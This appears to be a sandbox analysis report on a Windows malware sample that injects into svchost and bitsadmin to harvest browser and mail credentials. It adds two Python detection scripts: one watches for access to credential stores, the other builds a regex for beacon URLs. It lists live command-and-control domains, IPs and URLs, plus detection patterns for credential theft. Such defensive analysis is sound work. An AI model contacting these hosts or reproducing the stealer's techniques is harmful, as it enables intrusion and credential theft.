Source: 1SxKeB4u0c.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
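The rows above record a Windows utility (bitsadmin.exe) opening the Chrome and Edge credential stores and the Outlook profile registry key, after svchost.exe had been created with the sample's own command line and before bitsadmin.exe started firefox.exe. The Python below is an added example and not part of the Joe Sandbox report: it runs four rules over constructed process, file and registry events modelled on those rows, so that the same behaviour can be caught in endpoint telemetry. The event schema, the rule names and the watch lists of binaries and stores are this example's assumptions.

```python
"""Flag credential-store access and process-chain anomalies in endpoint telemetry.

Added example; the events below are constructed to mirror this report's rows (they
are not the sandbox's output) and the field layout is an assumed, Sysmon-like schema.
"""
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    kind: str          # "process" (creation), "file" (open) or "registry" (key open)
    image: str         # for "process": the new process; otherwise the acting process
    parent: str = ""   # creator of the new process ("process" events only)
    target: str = ""   # file path or registry key ("file"/"registry" events)
    cmdline: str = ""  # command line of the new process ("process" events)


# Assumed watch lists: system utilities that should never read user secrets or
# launch a browser, the browsers, and the credential stores named in the report.
LOLBINS = {"bitsadmin.exe", "svchost.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe"}
CREDENTIAL_STORES = (
    r"\google\chrome\user data\default\login data",
    r"\google\chrome\user data\default\web data",
    r"\google\chrome\user data\default\cookies",
    r"\google\chrome\user data\default\network\cookies",
    r"\microsoft\edge\user data\default\login data",
    r"\microsoft\edge\user data\default\network\cookies",
)
OUTLOOK_PROFILE_KEY = r"\windows messaging subsystem\profiles\outlook"


def first_token(cmdline: str) -> str:
    """Executable named by a Windows command line, honouring a quoted first token."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def base(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def detect(events):
    """Return (rule, detail) pairs for every event that trips a rule."""
    findings = []
    for ev in events:
        actor = base(ev.image)
        if ev.kind == "process":
            # A new process whose command line names a different executable than its
            # image is the hollowing tell (here: svchost.exe run as the sample).
            claimed = base(first_token(ev.cmdline))
            if claimed and claimed != actor:
                findings.append(("image_cmdline_mismatch", f"{ev.image} started as {ev.cmdline}"))
            if base(ev.parent) in LOLBINS and actor in BROWSERS:
                findings.append(("browser_spawned_by_lolbin", f"{ev.parent} -> {ev.image}"))
        elif ev.kind == "file" and actor in LOLBINS:
            if ev.target.lower().endswith(CREDENTIAL_STORES):
                findings.append(("credential_store_access", f"{ev.image} opened {ev.target}"))
        elif ev.kind == "registry" and actor in LOLBINS:
            if OUTLOOK_PROFILE_KEY in ev.target.lower():
                findings.append(("mail_profile_access", f"{ev.image} opened {ev.target}"))
    return findings


SAMPLE = r"C:\Users\user\Desktop\1SxKeB4u0c.exe"
SVCHOST = r"C:\Windows\SysWOW64\svchost.exe"
BITSADMIN = r"C:\Windows\SysWOW64\bitsadmin.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
CHROME_PROFILE = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"

# Constructed telemetry modelled on the report's rows, followed by two benign events.
EVENTS = [
    Event("process", image=SVCHOST, parent=SAMPLE, cmdline=f'"{SAMPLE}"'),
    Event("file", image=BITSADMIN, target=CHROME_PROFILE + r"\Login Data"),
    Event("file", image=BITSADMIN, target=CHROME_PROFILE + r"\Network\Cookies"),
    Event("registry", image=BITSADMIN,
          target=(r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                  "\\Windows Messaging Subsystem\\Profiles\\Outlook\\")),
    Event("process", image=FIREFOX, parent=BITSADMIN, cmdline=f'"{FIREFOX}"'),
    # benign: Chrome reading its own store, Explorer launching Firefox
    Event("file", image=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          target=CHROME_PROFILE + r"\Login Data"),
    Event("process", image=FIREFOX, parent=r"C:\Windows\explorer.exe", cmdline=f'"{FIREFOX}"'),
]

if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"{rule:28} {detail}")
```

The image/command-line mismatch rule is deliberately generic rather than tied to svchost.exe; it also fires for launchers that legitimately rewrite their command line, so in production it is best scored together with the parent (a user-writable path starting a System32 binary, as here) rather than alerted on alone.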

                Remote Access Functionality

Source: Yara match | File source: 3.2.svchost.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svchost.exe.420000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1682840085.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3894297177.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3897117965.0000000003740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3900036415.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3897375687.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1678896334.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3897666427.0000000002B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1683604299.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00476283
Source: C:\Users\user\Desktop\1SxKeB4u0c.exe | Code function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476747
MITRE ATT&CK matrix (rebuilt from the report's tactic grid; only cells that carry a figure are listed, and the figure in parentheses is the one the report shows in that cell)

Reconnaissance: no marked techniques
Resource Development: no marked techniques
Initial Access: Valid Accounts (2)
Execution: Native API (2); Service Execution (2)
Persistence: DLL Side-Loading (1); Valid Accounts (2); Windows Service (1)
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Windows Service (1); Process Injection (412)
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (4); Software Packing (1); Timestomp (1); DLL Side-Loading (1); Masquerading (111); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21)
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (126); Security Software Discovery (261); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
Lateral Movement: Taint Shared Content (1)
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3)
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4)
Exfiltration: no marked techniques
Impact: System Shutdown/Reboot (1)
Behavior Graph ID: 1588634 | Sample: 1SxKeB4u0c.exe | Startdate: 11/01/2025 | Architecture: WINDOWS | Score: 100

Start node
  DNS/IP: www.soainsaat.xyz; www.duwixushx.xyz; 16 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Antivirus detection for dropped file; 8 other signatures; Performs DNS queries to domains with low reputation (www.duwixushx.xyz)
  Started: 1SxKeB4u0c.exe (3); alg.exe; armsvc.exe

1SxKeB4u0c.exe
  DNS/IP: ssbzmoy.biz 18.141.10.107, ports 49706, 80, AMAZON-02, US, United States; pywolwnvd.biz 54.244.188.177, ports 49705, 80, AMAZON-02, US, United States
  Dropped: C:\Windows\System32\alg.exe, PE32+; C:\Windows\System32\AppVClient.exe, PE32+; C:\Program Files (x86)\...\armsvc.exe, PE32
  Signatures: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; 4 other signatures
  Started: svchost.exe

alg.exe
  Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file

svchost.exe (started by 1SxKeB4u0c.exe)
  Signatures: Maps a DLL or memory area into another process
  Injected: LbtMpScwNRqrVB.exe

LbtMpScwNRqrVB.exe (injected by svchost.exe)
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)
  Started: bitsadmin.exe (13)

bitsadmin.exe (started by LbtMpScwNRqrVB.exe)
  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
  Injected: LbtMpScwNRqrVB.exe
  Started: firefox.exe

LbtMpScwNRqrVB.exe (injected by bitsadmin.exe)
  DNS/IP: www.amayavp.xyz 185.27.134.144, ports 49727, 49728, 49729, WILDCARD-AS Wildcard UK Limited, GB, United Kingdom; www.xcvbj.asia 149.88.81.190, ports 49717, 49718, 49719, SAIC-AS, US, United States; 6 other IPs or domains
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)

Source | Detection | Scanner | Label | Link
1SxKeB4u0c.exe | 87% | ReversingLabs | Win32.Virus.Expiro |
1SxKeB4u0c.exe | 83% | Virustotal | | Browse
1SxKeB4u0c.exe | 100% | Avira | W32/Infector.Gen |
1SxKeB4u0c.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen |
C:\Windows\System32\AppVClient.exe | 100% | Avira | W32/Infector.Gen |
C:\Windows\System32\alg.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML | |
C:\Windows\System32\AppVClient.exe | 100% | Joe Sandbox ML | |
C:\Windows\System32\alg.exe | 100% | Joe Sandbox ML | |

No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://54.244.188.177/U | 100% | Avira URL Cloud | malware
http://server/get.asp | 0% | Avira URL Cloud | safe
http://www.nb-shenshi.buzz/xxr1/?3P=ZxaxIFQ&jNn=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM66l0nHsUGQdUfs4bd2jLDJzuKWSTJW9+MdVSz4bzmf2o9wQ== | 0% | Avira URL Cloud | safe
http://18.141.10.107/rosecbcswnrlukqt | 0% | Avira URL Cloud | safe
http://www.learnwithus.site | 0% | Avira URL Cloud | safe
http://www.xcvbj.asia/rq1s/?jNn=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF1bV5lTdIrZK4z5JaRyWkNAYPXYBCqbiI2n7IpSyVWea/Pg==&3P=ZxaxIFQ | 0% | Avira URL Cloud | safe
http://www.amayavp.xyz/d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2 | 100% | Avira URL Cloud | malware
http://18.141.10.107/: | 0% | Avira URL Cloud | safe
http://www.vayui.top/vg0z/?jNn=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTGqSKo7wbbDBvpzyjUmzrS97fS4i7YPii/B0AmEK1pqpQFw==&3P=ZxaxIFQ | 0% | Avira URL Cloud | safe
http://www.soainsaat.xyz/rum2/ | 100% | Avira URL Cloud | malware
http://www.laohub10.net/sgdd/ | 0% | Avira URL Cloud | safe
http://www.t91rl7.pro/jhb8/ | 0% | Avira URL Cloud | safe
http://www.laohub10.net/sgdd/?jNn=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZSiHxO15Gr8xk7hOHDVFXExJKBXBlW4uFPtlrZZXFJuvZOA==&3P=ZxaxIFQ | 0% | Avira URL Cloud | safe
http://www.vayui.top/vg0z/ | 0% | Avira URL Cloud | safe
http://www.rgenerousrs.store/o362/ | 0% | Avira URL Cloud | safe
http://18.141.10.107/rosecbcswnrlukq2524.400 | 0% | Avira URL Cloud | safe
http://www.t91rl7.pro/jhb8/?jNn=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv0JB40X+6ZYpMJWzP2nxEXACS3GxK9okeiaSzZusyrXZl7w==&3P=ZxaxIFQ | 0% | Avira URL Cloud | safe
http://www.learnwithus.site/alu5/ | 0% | Avira URL Cloud | safe
http://18.141.10.107/rosecbcswnrlukq | 0% | Avira URL Cloud | safe
http://www.xcvbj.asia/rq1s/ | 0% | Avira URL Cloud | safe
http://54.244.188.177/L | 100% | Avira URL Cloud | malware
http://www.amayavp.xyz/d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K9aiv+zbDkEKhMSDsVMvwPhhINhuEU9ODct9Lj1wj6urmQ==&3P=ZxaxIFQ | 100% | Avira URL Cloud | malware
http://www.amayavp.xyz/d9ku/ | 100% | Avira URL Cloud | malware
http://www.rgenerousrs.store/o362/?3P=ZxaxIFQ&jNn=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqD1uW41+CEwYhbzlB+9nxdj867jKwdHPO1yv4Ykeg9vUq/A== | 0% | Avira URL Cloud | safe
http://18.141.10.107:80/rosecbcswnrlukqp | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.vayui.top | 104.21.95.160 | true | false | | high
www.amayavp.xyz | 185.27.134.144 | true | false | | high
ssbzmoy.biz | 18.141.10.107 | true | false | | high
www.7vh2wy.top | 20.2.249.7 | true | true | | unknown
pywolwnvd.biz | 54.244.188.177 | true | false | | high
r0lqcud7.nbnnn.xyz | 23.225.160.132 | true | false | | high
www.xcvbj.asia | 149.88.81.190 | true | false | | high
www.duwixushx.xyz | 156.251.17.224 | true | false | | high
www.rafconstrutora.online | 104.21.48.1 | true | false | | high
www.rgenerousrs.store | 188.114.97.3 | true | false | | high
natroredirect.natrocdn.com | 85.159.66.93 | true | false | | high
www.learnwithus.site | 209.74.77.107 | true | false | | high
www.nb-shenshi.buzz | 161.97.142.144 | true | false | | high
www.t91rl7.pro | 154.88.22.101 | true | false | | high
www.cuthethoi.online | unknown | unknown | false | | unknown
www.soainsaat.xyz | unknown | unknown | false | | high
www.laohub10.net | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://www.soainsaat.xyz/rum2/ | true | Avira URL Cloud: malware | unknown
http://www.vayui.top/vg0z/?jNn=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTGqSKo7wbbDBvpzyjUmzrS97fS4i7YPii/B0AmEK1pqpQFw==&3P=ZxaxIFQ | true | Avira URL Cloud: safe | unknown
http://www.xcvbj.asia/rq1s/?jNn=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF1bV5lTdIrZK4z5JaRyWkNAYPXYBCqbiI2n7IpSyVWea/Pg==&3P=ZxaxIFQ | true | Avira URL Cloud: safe | unknown
http://www.nb-shenshi.buzz/xxr1/?3P=ZxaxIFQ&jNn=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM66l0nHsUGQdUfs4bd2jLDJzuKWSTJW9+MdVSz4bzmf2o9wQ== | true | Avira URL Cloud: safe | unknown
http://pywolwnvd.biz/gprpendvhdrdevgd | false | | high
http://www.laohub10.net/sgdd/?jNn=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZSiHxO15Gr8xk7hOHDVFXExJKBXBlW4uFPtlrZZXFJuvZOA==&3P=ZxaxIFQ | true | Avira URL Cloud: safe | unknown
http://www.laohub10.net/sgdd/ | true | Avira URL Cloud: safe | unknown
http://www.vayui.top/vg0z/ | true | Avira URL Cloud: safe | unknown
http://www.t91rl7.pro/jhb8/ | true | Avira URL Cloud: safe | unknown
http://www.rgenerousrs.store/o362/ | true | Avira URL Cloud: safe | unknown
http://www.t91rl7.pro/jhb8/?jNn=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv0JB40X+6ZYpMJWzP2nxEXACS3GxK9okeiaSzZusyrXZl7w==&3P=ZxaxIFQ | true | Avira URL Cloud: safe | unknown
http://ssbzmoy.biz/rosecbcswnrlukq | false | | high
http://www.xcvbj.asia/rq1s/ | true | Avira URL Cloud: safe | unknown
http://www.rgenerousrs.store/o362/?3P=ZxaxIFQ&jNn=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqD1uW41+CEwYhbzlB+9nxdj867jKwdHPO1yv4Ykeg9vUq/A== | true | Avira URL Cloud: safe | unknown
http://www.amayavp.xyz/d9ku/ | true | Avira URL Cloud: malware | unknown
http://www.amayavp.xyz/d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K9aiv+zbDkEKhMSDsVMvwPhhINhuEU9ODct9Lj1wj6urmQ==&3P=ZxaxIFQ | true | Avira URL Cloud: malware | unknown
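The URLs the report marks as malicious share one shape: a four-character directory followed by a query carrying a long base64-like jNn value and a short 3P token (ZxaxIFQ in every case), in either order. The Python below is an added example and not part of the Joe Sandbox report: it learns that shape from the report's own URLs, checks candidate URLs against it, and emits a regular expression that can be dropped into a proxy or IDS rule. The negative URLs are also taken from this report's tables; the profile fields, the half-to-double length tolerance and the function names are this example's own choices.

```python
"""Derive a beacon-URL profile from this report's C2 URLs and emit a matching regex.

Added example, not part of the Joe Sandbox report. The URLs are copied from the
report's URL tables; the profile, tolerances and function names are assumptions.
"""
import re
from itertools import permutations
from urllib.parse import urlsplit

# URLs the report lists as malicious (copied from the tables above).
C2_URLS = [
    "http://www.vayui.top/vg0z/?jNn=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTGqSKo7wbbDBvpzyjUmzrS97fS4i7YPii/B0AmEK1pqpQFw==&3P=ZxaxIFQ",
    "http://www.xcvbj.asia/rq1s/?jNn=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF1bV5lTdIrZK4z5JaRyWkNAYPXYBCqbiI2n7IpSyVWea/Pg==&3P=ZxaxIFQ",
    "http://www.nb-shenshi.buzz/xxr1/?3P=ZxaxIFQ&jNn=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM66l0nHsUGQdUfs4bd2jLDJzuKWSTJW9+MdVSz4bzmf2o9wQ==",
    "http://www.laohub10.net/sgdd/?jNn=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZSiHxO15Gr8xk7hOHDVFXExJKBXBlW4uFPtlrZZXFJuvZOA==&3P=ZxaxIFQ",
    "http://www.t91rl7.pro/jhb8/?jNn=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv0JB40X+6ZYpMJWzP2nxEXACS3GxK9okeiaSzZusyrXZl7w==&3P=ZxaxIFQ",
    "http://www.rgenerousrs.store/o362/?3P=ZxaxIFQ&jNn=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqD1uW41+CEwYhbzlB+9nxdj867jKwdHPO1yv4Ykeg9vUq/A==",
    "http://www.amayavp.xyz/d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K9aiv+zbDkEKhMSDsVMvwPhhINhuEU9ODct9Lj1wj6urmQ==&3P=ZxaxIFQ",
]
# Other URLs from the same tables, used here as negatives.
OTHER_URLS = [
    "http://www.soainsaat.xyz/rum2/",
    "http://pywolwnvd.biz/gprpendvhdrdevgd",
    "http://ssbzmoy.biz/rosecbcswnrlukq",
    "https://duckduckgo.com/chrome_newtab",
    "https://www.ecosia.org/newtab/",
    "http://server/get.asp",
]

B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def path_shape(url):
    """Segment lengths plus whether the path ends in '/': '/vg0z/' -> (4, True)."""
    path = urlsplit(url).path
    return tuple(len(s) for s in path.split("/") if s) + (path.endswith("/"),)


def query_pairs(url):
    """(key, value) pairs without percent/plus decoding, so base64 '+' survives."""
    query = urlsplit(url).query
    return [tuple(part.partition("=")[::2]) for part in query.split("&") if part]


def learn_profile(urls):
    """Common path shape and, per query key, value length range and base64-likeness."""
    shapes = {path_shape(u) for u in urls}
    if len(shapes) != 1:
        raise ValueError("training URLs do not share one path shape")
    keys = {}
    for u in urls:
        for k, v in query_pairs(u):
            st = keys.setdefault(k, {"min": len(v), "max": len(v), "b64": True})
            st["min"], st["max"] = min(st["min"], len(v)), max(st["max"], len(v))
            st["b64"] = st["b64"] and bool(B64.match(v))
    return {"path": shapes.pop(), "keys": keys}


def matches(url, profile):
    """Learned path shape, exactly the learned keys, each value of the learned class
    and between half and double the observed length."""
    if path_shape(url) != profile["path"]:
        return False
    q = dict(query_pairs(url))
    if set(q) != set(profile["keys"]):
        return False
    for k, st in profile["keys"].items():
        v = q[k]
        if not (st["min"] // 2 <= len(v) <= st["max"] * 2):
            return False
        if st["b64"] and not B64.match(v):
            return False
    return True


def to_regex(profile):
    """Regex for a proxy/IDS rule: any host, learned path shape, learned keys in any order."""
    *seg_lens, trailing = profile["path"]
    path = "/" + "/".join(f"[A-Za-z0-9]{{{n}}}" for n in seg_lens) + ("/" if trailing else "")

    def value(st):
        lo, hi = max(1, st["min"] // 2), st["max"] * 2
        return f"[A-Za-z0-9+/]{{{lo},{hi}}}={{0,2}}" if st["b64"] else f"[^&]{{{lo},{hi}}}"

    orders = ["&".join(f"{re.escape(k)}={value(profile['keys'][k])}" for k in order)
              for order in permutations(profile["keys"])]
    return r"^https?://[^/?#]+" + path + r"\?(?:" + "|".join(orders) + r")$"


def compile_profile(profile):
    return re.compile(to_regex(profile))


def beacon_hosts(urls, profile):
    """Hosts to block: every host that served a URL matching the profile."""
    return sorted({urlsplit(u).hostname for u in urls if matches(u, profile)})


if __name__ == "__main__":
    prof = learn_profile(C2_URLS)
    print(to_regex(prof))
    print(beacon_hosts(C2_URLS + OTHER_URLS, prof))
```

The profile requires the query, so the bare directory forms the report also lists (for example http://www.soainsaat.xyz/rum2/) are deliberately not matched; a four-character directory on its own is far too common to alert on without the query, and those hosts are better handled through the domain list. The regex generalises beyond the seven training hosts because it matches any host with the learned path and query shape, which is the point of profiling rather than listing.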
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://54.244.188.177/U | 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://duckduckgo.com/ac/?q= | bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://server/get.asp | svchost.exe, 00000003.00000003.1647360528.0000000000848000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1647240452.000000000081A000.00000004.00000020.00020000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000002.3895903417.0000000000E88000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pywolwnvd.biz/ | 1SxKeB4u0c.exe, 00000000.00000002.1454333051.0000000000A48000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.amayavp.xyz/d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2 | bitsadmin.exe, 00000007.00000002.3901034912.0000000006970000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3899231858.00000000049CC000.00000004.10000000.00040000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000008.00000002.3898161129.000000000385C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://18.141.10.107/rosecbcswnrlukqt | 1SxKeB4u0c.exe, 00000000.00000002.1454763210.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.learnwithus.site | LbtMpScwNRqrVB.exe, 00000008.00000002.3900036415.00000000052BB000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://18.141.10.107/: | 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://18.141.10.107/ | 1SxKeB4u0c.exe, 1SxKeB4u0c.exe, 00000000.00000002.1454454014.0000000000A88000.00000040.00000020.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://18.141.10.107/rosecbcswnrlukq2524.400 | 1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe |
                                                                        unknown
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchbitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.learnwithus.site/alu5/LbtMpScwNRqrVB.exe, 00000008.00000002.3900036415.00000000052BB000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://18.141.10.107/rosecbcswnrlukq1SxKeB4u0c.exe, 00000000.00000002.1454763210.0000000000BEF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=bitsadmin.exe, 00000007.00000003.1874225056.00000000084F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://54.244.188.177/L1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            http://18.141.10.107:80/rosecbcswnrlukqp1SxKeB4u0c.exe, 00000000.00000002.1454499072.0000000000ABA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
Legend (share of contacted IPs per entry):
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
149.88.81.190 | www.xcvbj.asia | United States | 188 | SAIC-ASUS | false
161.97.142.144 | www.nb-shenshi.buzz | United States | 51167 | CONTABODE | false
188.114.97.3 | www.rgenerousrs.store | European Union | 13335 | CLOUDFLARENETUS | false
185.27.134.144 | www.amayavp.xyz | United Kingdom | 34119 | WILDCARD-ASWildcardUKLimitedGB | false
